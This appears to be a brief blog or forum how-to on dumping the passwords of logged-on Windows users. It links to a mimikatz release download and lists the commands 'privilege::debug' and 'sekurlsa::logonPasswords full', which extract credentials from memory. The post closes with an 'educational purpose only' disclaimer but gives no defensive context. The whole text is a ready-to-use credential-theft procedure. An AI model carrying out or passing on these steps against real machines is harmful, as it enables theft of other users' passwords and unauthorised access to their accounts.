How to get windows logged on users passwords
        How to get windows logged on users passwords    Download the mimikatz tool from below link     https://github.com/gentilkiwi/mimikatz/releases/download/2.1.0-20160922/mimikatz_trunk.zip       Extract the zip and select the appropriate windows architecture              Run the below two commands   Cmd1 privilege::debug       Cmd2  sekurlsa::logonPasswords full           You see the password for your computer account       Note:-This is for educational purpose only. try at your own risk.